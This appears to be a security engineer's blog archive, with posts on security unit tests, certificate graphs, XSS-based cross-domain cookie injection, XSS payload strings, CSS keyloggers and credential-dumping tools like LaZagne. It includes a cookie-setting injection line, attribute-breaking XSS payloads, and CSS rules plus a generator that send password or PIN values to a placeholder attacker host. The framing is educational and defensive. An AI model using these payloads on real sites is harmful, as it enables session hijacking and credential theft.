Author Archives: Michael Hendrickx

Security Unit Tests

One of the reasons why security creates a challenge in software companies is that we, as security engineers, fail to meet the developers where they live.

Security tools and processes (pentests) typically result in a human-readable report, or at best a standardized file format (SARIF, etc.).

During technical security reviews, teams often file bugs and do a manual re-check. They explain what the issue is, rate its risk, perhaps give a detailed remediation plan (rather than a vague “check for malicious user input”), and may retest once the developer team claims to have fixed the bug.

A better way to tackle this is to prepare security unit tests. These are essentially unit tests that check for a security control. For example, classes of controls such as:

  • Client certificate validation
  • OAuth2 Token validation
  • File upload validation
  • WebRequest validation

Testing these can be automated and done in a more continuous way. Say we have a web endpoint that allows client certificate authentication, where the cert must be signed by our intermediate CA and carry a whitelisted SNI. For that, we run the following list of tests:

  • Authenticate with the correct certificate (should succeed)
  • Cert with valid SNI, signed by a malicious CA (should fail)
  • Certificate with the wrong SNI, but the correct CA (should fail)
  • Expired certificate, yet the correct SNI and CA (should fail)
  • Revoked cert (SNI, not expired, CA) (should fail)
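As a sketch of what that test matrix could look like in code (Python, with a hypothetical validate_client_cert helper standing in for the real TLS stack; all names and values here are made up):

```python
import datetime

# Hypothetical stand-ins for the real TLS stack: a real suite would drive
# the actual endpoint with real client certificates.
TRUSTED_CA = "CN=Contoso Intermediate CA"
ALLOWED_SNI = {"client.contoso.com"}
REVOKED_SERIALS = {"1337"}

def validate_client_cert(issuer, sni, not_after, serial,
                         now=datetime.datetime(2020, 1, 1)):
    """Pass only when every security control holds."""
    if issuer != TRUSTED_CA:        # signed by our intermediate CA?
        return False
    if sni not in ALLOWED_SNI:      # whitelisted SNI?
        return False
    if not_after < now:             # not expired?
        return False
    if serial in REVOKED_SERIALS:   # not revoked (CRL/OCSP)?
        return False
    return True

good = dict(issuer=TRUSTED_CA, sni="client.contoso.com",
            not_after=datetime.datetime(2021, 1, 1), serial="abcd")

assert validate_client_cert(**good)                                  # correct cert
assert not validate_client_cert(**{**good, "issuer": "CN=Evil CA"})  # malicious CA
assert not validate_client_cert(**{**good, "sni": "evil.example"})   # wrong SNI
assert not validate_client_cert(
    **{**good, "not_after": datetime.datetime(2019, 1, 1)})          # expired
assert not validate_client_cert(**{**good, "serial": "1337"})        # revoked
print("all client-cert tests passed")
```

Each assert maps one-to-one onto a bullet above; the value of the exercise is that a developer can run the whole matrix on every build.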

Some libraries that perform certificate validation may not perform all checks (the CRL check, for instance). For debugging purposes, a developer may include a “fail open” fallback, and that code may get checked in and deployed to production.

Some more examples:

  • File uploads: check for zip bombs, embedded ZIPs, malware, malformed formats, XXE, deserialization, etc.
  • JWT token validation: look at unsigned tokens, expired tokens, tokens that are generated – and signed – by the wrong issuer, tokens for the wrong audience, wrong signing algorithms (HS* versus RS*), etc.
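The JWT cases lend themselves particularly well to negative tests. Below is a stdlib-only sketch (a toy HS256 verifier written for illustration, not a real JWT library; the secret and audience values are made up):

```python
import base64
import hashlib
import hmac
import json
import time

# Assumption: HS256 with a shared secret; real code would use a JWT library.
SECRET = b"hypothetical-shared-secret"

def b64url(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def make_token(payload: dict, alg: str = "HS256", key: bytes = SECRET) -> str:
    header = b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    signing_input = header + b"." + body
    sig = b"" if alg == "none" else b64url(
        hmac.new(key, signing_input, hashlib.sha256).digest())
    return (signing_input + b"." + sig).decode()

def validate(token: str, audience: str) -> bool:
    header_b64, body_b64, sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":              # reject "none" / alg confusion
        return False
    expected = b64url(hmac.new(SECRET, f"{header_b64}.{body_b64}".encode(),
                               hashlib.sha256).digest()).decode()
    if not hmac.compare_digest(sig, expected):    # wrong issuer / key
        return False
    claims = json.loads(b64url_decode(body_b64))
    if claims.get("exp", 0) < time.time():        # expired token
        return False
    if claims.get("aud") != audience:             # wrong audience
        return False
    return True

claims = {"aud": "api.contoso.com", "exp": time.time() + 3600}
aud = "api.contoso.com"
assert validate(make_token(claims), aud)                      # valid token
assert not validate(make_token(claims, alg="none"), aud)      # unsigned
assert not validate(make_token(claims, key=b"wrong"), aud)    # wrong signer
assert not validate(make_token({**claims, "exp": 0}), aud)    # expired
assert not validate(make_token({**claims, "aud": "x"}), aud)  # wrong audience
print("all JWT negative tests passed")
```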

So, to summarize: instead of producing only human-readable output, security tools and processes should also think about producing unit tests.

CertGraph: visualizing the distribution of trusted CA’s

Much of the Internet’s security posture relies on the correct implementation of certificates, or certs. We’ve all been taught to look for the “green lock” on websites, and things such as mixed content warnings and HSTS are a good push for that.

Certs 101:

Websites, say, have a leaf certificate. This certificate holds some metadata, including a key that’s used to encrypt traffic (an oversimplification; TLS is explained in depth here). That leaf certificate needs to be trusted by your user agent. Since you can’t trust every certificate in the world, you instead trust whoever issued it: a certificate is signed by a trusted party (a CA), or by a party that’s in turn trusted by a root CA. Typically, root CA’s are trusted by your computer, and they allow intermediate CA’s to issue leaf certs.


User agents (sometimes delegating to the operating system) ship with several pre-installed certificates of these root CA’s. There may be more of them than you’d anticipate: a typical Windows installation has a few dozen, if not hundreds, of trusted root CA’s.

Now, each of these root CA’s can trust several intermediate certs, which can issue certs (or trust other CA’s, and so on). So, essentially, you’re trusting hundreds, if not thousands, of entities. These are usually a combination of companies as well as governments.

Since these leaves create several paths to their roots, and since I’m a sucker for visualizing graphs, I decided to graph out the certificates of Alexa’s top 1M websites; the script crashed after some 67,000 of them, though.

Note that this is a large dataset, which will slow down the visualization. You can download the JSON files from GitHub.

The Graph

You can play around with the data set (warning: graph rendering might be slow on large datasets), and eventually you’ll have something like the chart below.

Distribution of certificates of the top ~60k popular sites.

Getting the data

The files come with a .NET Core 3 client app which will scan a text file of hostnames and store the certificate chains in a JSON blob. They’re essentially [rootca]->[intermediate]->[…]->leaf. I only opted for name, subject, expiry, serial and thumbprint, but you can get anything that the X509Certificate2 class gives you. For example, it might be cool to see which CA’s give the longest-valid certs, or what key sizes are used, etc.
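To give an idea of the stored shape, here is a minimal sketch (Python rather than the repo’s C#; the field names are my guess at a minimal schema, not the exact one, and the thumbprint is faked so the sketch stays offline):

```python
import hashlib
import json

# Hypothetical chain for one host: root CA first, leaf last, with the five
# fields mentioned above.
chain = [
    {"name": "Example Root CA", "subject": "CN=Example Root CA",
     "expiry": "2035-01-01", "serial": "01"},
    {"name": "Example Intermediate CA", "subject": "CN=Example Intermediate CA",
     "expiry": "2030-01-01", "serial": "02"},
    {"name": "www.example.com", "subject": "CN=www.example.com",
     "expiry": "2021-01-01", "serial": "03"},
]
for cert in chain:
    # A real thumbprint is the SHA-1 hash of the certificate's DER bytes;
    # here we hash the serial just to fill the field.
    cert["thumbprint"] = hashlib.sha1(cert["serial"].encode()).hexdigest()

record = {"host": "www.example.com", "chain": chain}
print(json.dumps(record, indent=2))
```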

Technically, I created a custom RemoteCertificateValidationCallback, which is typically used to perform SSL validation (such as checking CRL’s, which .NET doesn’t do out of the box).

Again, please play around with it, and let me know if you’d like to see something added.


Cross domain cookie contamination

TLDR: XSS attacks can be used to set cookies for subdomains that share the same top level domain. This increases the scope of XSS attacks.

In a cloud world, several applications are hosted under the same top level domain. An organization can have hostnames for things such as:

  • a corporate landing page
  • webmail
  • internal resources
  • a web store

Since they all share the same top level domain, an XSS vulnerability can be used to set domain-wide cookies. Domain-wide cookies are inherited by all subdomains, so it could contaminate cookie values of other subdomains.

The “attack”

There are two main scenarios, both on the same top level domain: one host with an exploitable XSS flaw (say, blog.example.com), and one that uses cookies for session management (say, shop.example.com). An attacker exploits a victim using the XSS vuln, but instead of doing the obvious cookie stealing or DOM manipulation (on blog.example.com), he can set arbitrary cookies for the entire domain, including shop.example.com. If he’d execute something like (hostnames hypothetical):

document.cookie = "SessionId=<attacker-controlled value>; domain=.example.com; path=/";

He could successfully “log in” the victim onto an arbitrary account, or alter settings or even CSRF tokens.


If a host has a cookie with that name set already, the browser (Firefox under Ubuntu 18.04 at least; I’m still testing others) will present both cookies. I’m currently figuring out what different frameworks do when several cookies are presented with the same name.
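To see why this matters, here’s a short Python sketch (the header and cookie values are made up) of two plausible parsing behaviors for a duplicated cookie name:

```python
from http.cookies import SimpleCookie

# Hypothetical Cookie header a victim's browser could send: the host's own
# cookie plus the attacker's domain-wide cookie, under the same name.
header = "SessionId=legit-value; SessionId=attacker-value"

jar = SimpleCookie()
jar.load(header)
# SimpleCookie overwrites as it parses, so the last occurrence wins.
print(jar["SessionId"].value)

# A framework that takes the first occurrence instead would disagree:
first_wins = {}
for name, value in (kv.split("=", 1) for kv in header.split("; ")):
    first_wins.setdefault(name, value)
print(first_wins["SessionId"])
```

Two parsers, same header, two different sessions: exactly the kind of ambiguity an attacker can exploit.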

This may make for interesting attacks, especially for applications that are hosted on a “more critical” top level domain, or are “shared” across cloud providers.


Not a foolproof solution, but you probably want to move away from storing values in cookies that can dictate a particular state, unless they can be validated (via a signature, …), or host applications of different “value” off different top level domains.

If you have a JavaScript-rich application, and you handle authentication (API calls, etc.) with tokens that you store in cookies, you may want to opt for localStorage or sessionStorage rather than HTTP cookies.

And of course, don’t host applications with XSS. 🙂

The revival of (cross site) script kiddies

First off, a Happy 2019!

Being in charge of adjudicating Microsoft’s Cloud Bug Bounty, we see many “low hanging fruit” XSS bugs coming through. While we have tools that catch these bugs, sometimes they slip through the cracks. Also, since machines won’t find every.single.bug.ever, we pay out for interesting bugs, and bump up payouts for high quality reports. Sadly though, many of these bugs make us utter a “how come our tools didn’t catch this?”, rather than a “wow, that’s an interesting approach!”. Needless to say, the latter would get higher payouts.

XSS 101

I hope most of you know cross site scripting (XSS). If you can inject active content (JavaScript, 9 times out of 10) into a page that, preferably, others will see, you have cross site scripting. There may be other nuances to this, but that’s generally my approach. The best way of showing this is to perform an

alert(document.domain);

which will display the current context’s domain. Showing the current domain, rather than a “123”, “foo” or “pwnage!!1!” message, clearly shows which domain’s DOM you have access to. In the world of embedded iframes, that proves to be useful.


Most XSS payloads, and there are several lists out there, are designed to be injected into a page’s DOM. Since the application you’re targeting may be prefixing your input with some markup, you may have to close a previous tag. The tainted data may be included as an HTML attribute, as part of a JS script block, or just as general HTML content. For these, a payload like:

  • ” onmouseover=”alert(123)
  • “; alert(123); var foo=”
  • </textarea><script>alert(123);</script>

may have to come into play. Needless to say, that list is endless.


Being on the receiving side of bug bounty submissions, and spending several evenings in HTTP access_log or W3SVC1 log files performing pattern analysis, I see significantly more breadth than depth. Meaning that many will try a vanilla <script>alert(123)</script> payload, rather than following how the data ends up in the DOM, missing out on bugs, and payouts.

So for that, I’d ask: if you find yourself mindlessly copy-pasting XSS payloads into each field, don’t treat the absence of an alert dialog box as a binary verdict (“the site is not vulnerable”); maybe you just need to perform some taint analysis and try again.

Create random passwords with PowerShell

A task I see myself do occasionally is to generate a password or other symmetric secret. Of course, to avoid things like “Azure123!”, and even going beyond correct horse battery staple mechanisms, I like to generate random strings and store them in a password vault, either online or local.

At work, I (have to) use PowerShell quite a bit, so I use the following line to come up with a 20-char random password containing digits and upper- and lowercase letters. (Note that piping a collection into Get-Random -Count picks items without repetition, which weakens the password; drawing one character at a time allows repeats:)

-join (1..20 | %{ [char](Get-Random -InputObject ((48..57)+(65..90)+(97..122))) })

If you need to include special chars, I typically tend to add !, #, *, -, @ and ~ to the mix, since they’re unlikely to have a special meaning to an underlying system. Their corresponding ASCII values can be added simply:

-join (1..36 | %{ [char](Get-Random -InputObject ((33,35,42,45,64,126)+(48..57)+(65..90)+(97..122))) })

(Get-Random is not documented as a cryptographically secure RNG; for high-value secrets, consider [System.Security.Cryptography.RandomNumberGenerator]::GetInt32() instead.)
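For comparison outside PowerShell, the same idea in Python is a one-liner over the secrets module, which is backed by a CSPRNG (the special-character set below mirrors the one above):

```python
import secrets
import string

# Digits, upper- and lowercase letters, plus the "safe" specials !, #, *, -, @, ~.
alphabet = string.ascii_letters + string.digits + "!#*-@~"
password = "".join(secrets.choice(alphabet) for _ in range(20))
print(password)
```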

CSS keyloggers, hype and/or impact

A few days ago, I stumbled across one of LiveOverflow’s videos, where he discusses a so-called “CSS keylogger” (github), its impact and novelty.

While there’s nothing new about the attack (it was reported several years ago, yet it popped up again on YCombinator’s Hacker News), I guess it triggered LiveOverflow to make the video.

This “attack”, where CSS is abused by altering an object’s background based on its content, allows it to be dubbed a keylogger; although, as he rightfully notes in his video, keyloggers usually capture keystrokes system-wide. As a TLDR, the attack basically works like this:

input[type="password"][value$="a"] { background-image: url(https://attacker.example/a); }
input[type="password"][value$="b"] { background-image: url(https://attacker.example/b); }
input[type="password"][value$="aa"] { background-image: url(https://attacker.example/aa); }
input[type="password"][value$="ab"] { background-image: url(https://attacker.example/ab); }

The problem, as he points out too, is that you need a CSS file that’s several megabytes and potentially contains every password in the book (since the rules don’t get triggered per keystroke, only on the full value), which – when exploited with an HTML injection attack – may not be very feasible or realistic.

One thing would make this more feasible, though. If you rely on external hosts to serve your CSS files, such as a CDN (or stylesheets referenced with an @import rule), a malicious CDN could host a pseudo-keylogging CSS file. Also, while provisioning a file with all passwords may be difficult, any input with a limited key space may be a good target for this attack; PIN codes or 2FA numeric challenges come to mind.
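To make the limited-key-space point concrete, here’s a short Python sketch that emits the full rule set for a 4-digit PIN field (attacker.example is a placeholder exfiltration host):

```python
# 10,000 possible PINs means 10,000 CSS rules - a stylesheet small enough
# to serve from a compromised CDN without raising eyebrows.
rules = [
    f'input[type="password"][value$="{pin:04d}"] '
    f'{{ background-image: url(https://attacker.example/{pin:04d}); }}'
    for pin in range(10000)
]
print(rules[0])
print(f"{len(rules)} rules, ~{sum(map(len, rules)) // 1024} KiB of CSS")
```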

People are usually a bit wary about where they host their JavaScript files (XSS attacks, etc.); CSS is generally treated in a more relaxed way.

Ensure, if you deal with sensitive user input, that you host your CSS files in a trusted environment. For defense in depth, you can include a Content-Security-Policy header (e.g. style-src 'self') that will only allow CSS from whitelisted sources.

Washington State

So, it’s been a while since I last updated this blog – a bad habit of mine. I moved a while ago to Washington State, to be closer to work. Still setting everything up, with all the usual issues that happen when moving countries, but yay! New places to visit, new people to meet, new things to do!

Nullcon 2017

A few months ago, I was asked to speak at Nullcon 2017, which concluded a few weeks ago. It was a very well set up conference, and it attracts a lot of the security community in the Indian subcontinent. A pleasure to speak at, and I’d be happy to do it again in Goa in 2018.

I presented how to sign up for Microsoft Azure in order to find security vulnerabilities for our Azure Bug Bounty program. We presented together with Facebook, Google, BugCrowd and HackerOne to entice the community to participate in bug bounties.

Anyway, a quick thank you to the organizers, and hope to see you all in 2018 in beautiful, sunny Goa!

The lost art of penetration testing

Just a little rant.
Often, a security consultant is asked to perform a VA/PT (the difference is a whole topic for another day) for a customer in a number of man-days. Obviously, as with most service-based deliverables, one quantifies work in the time spent on it: hours, or – more often – days. But this creates a false sense of security. Time spent is not the right yardstick.

When dealing with a business deadline (i.e. the app needs to be released today, the new portal needs to be pushed next week, …), we often compromise on security, and treat the security audit, or VA/PT if you like, as a checkbox:

oh, no critical and/or highs? we’re good to go. We’ll fix the rest later

And that is bad for two reasons:

  • The rest is never fixed
  • You’re ‘protected’ only against whoever spends X amount of time on it

This is, in my opinion, why bug bounty programs are so effective, and essential for any organization. Yes, you’re tongue-in-cheek giving attackers the green light to assess your security, but you equally get an assessment 24/7, not limited in time.

After joining Microsoft, I’ve been very involved in some of the Bug Bounty programs MSFT offers, and most of the “juicy bugs” (the real eye openers) are the result of days, weeks and sometimes even months of testing, failing, and retesting.

If you have internal (technical) information security staff, embrace the notion of continuous testing. Yes, some properties need a checkbox assessment before going live, but don’t let anyone stop there. If you don’t have the internal muscle power, embrace a bug bounty program. There are several clever minds out there who would uncover sometimes hard-to-find bugs, because they like doing so.

Post exploitation tools: Lazagne

Often, after a compromise of a machine, red teams / adversaries search for certificates or credentials to hop to other machines, often referred to as “lateral movement”. When doing so, many use Mimikatz, a tool that extracts credentials, PIN codes and Kerberos tickets from memory. There are countless blog articles about how to detect it, hide it from AV, etc.

But another nifty tool that many don’t know about is LaZagne. It searches for credentials in files and the registry: not just your Windows credentials, but things you save in your browsers, mail clients, FTP clients, keyrings, etc.